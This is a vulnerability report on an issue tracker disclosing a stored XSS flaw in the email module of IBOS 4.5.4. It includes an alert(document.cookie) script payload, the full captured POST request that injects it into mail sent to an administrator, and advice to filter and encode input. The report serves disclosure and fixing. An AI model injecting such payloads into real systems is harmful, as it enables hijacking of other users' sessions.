
IBOS open-source OA collaborative office management / IBOS

Email function has XSS vulnerability in emailbody[content] parameter

Done
Created on 2020-01-12 23:04

Test environment

os: windows
IBOS version: 4.5.4
Discovery time: 2020/1/12
download IBOS time: 2020/1/9

Testing process

Create a new user

Create a new account, test1, with normal user permissions.

Log in as test1 and open the email module.

Send an email

Send an email to the Super Administrator.

Capture the request that sends the email, modify the value of the emailbody[content] parameter by appending a payload such as <script>alert(document.cookie)</script>, and "Forward" it.

Payload:

<script>alert(document.cookie)</script>

The test packet looks like this:

POST /?r=email/content/add HTTP/1.1
Host: 192.168.126.141:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 423
Origin: http://192.168.126.141:8090
Connection: close
Referer: http://192.168.126.141:8090/?r=email/content/add
Cookie: JV66_saltkey=R62zxTJ6; PHPSESSID=gsbu4no765jlira852mg7mp2b0; JV66_sid=K5NrmE; lastautologin=0; JV66_lastactivity=1578840035; JV66_ulastactivity=bd03C060mWlgg1zpb4SMJXTC9%2FA1PYx734o%2BZjxQ8U7Cnun%2FGGM0; JV66_lately.SelectBox=u_1; JV66_creditremind=0D0D2D1D0D0D5; JV66_creditbase=0D0D4D1D0D0; JV66_creditrule=%E5%86%99%E9%82%AE%E4%BB%B6; JV66_dropnotify=%7B%22user%22%3A%221%22%2C%22unread_notify%22%3A1%2C%22unread_atme%22%3A0%2C%22unread_comment%22%3A0%2C%22unread_message%22%3A0%2C%22new_folower_count%22%3A0%2C%22unread_total%22%3A1%7D
Upgrade-Insecure-Requests: 1

emailbody%5Btoids%5D=u_1&emailbody%5BisOtherRec%5D=0&emailbody%5BisWebRec%5D=0&emailbody%5Bcopytoids%5D=&emailbody%5Bsecrettoids%5D=&emailbody%5Bimportant%5D=0&emailbody%5Bsubject%5D=aaaaaaaaaaaaaaaaa&file=&emailbody%5Battachmentid%5D=&emailbody%5Bissend%5D=1&op=new&backurl=http%3A%2F%2F192.168.126.141%3A8090%2F%3Fr%3Demail%2Flist%2Findex&formhash=0ea1467f&emailbody%5Bcontent%5D=%3Cp%3Eaaassssssssss%3Cbr%2F%3E%3C%2Fp%3E<script>alert(document.cookie)</script>

Log in as the super manager

Log in as the super manager and receive the email.

Open the email content: the malicious JavaScript code runs and shows the cookie value.

Solution

Filter or encode special characters such as these:

<
>
"
'
&
%
... ...

and filter keywords such as these:

script
javascript
... ...

or filter tag attributes that can run JavaScript, such as these:

onclick
onerror
onload
... ...

Comments (0)

c0d1M4x created the task
c0d1M4x changed the title
c0d1M4x changed the description
seekArt changed the task status from To Do to In Progress
seekArt changed the task status from In Progress to Done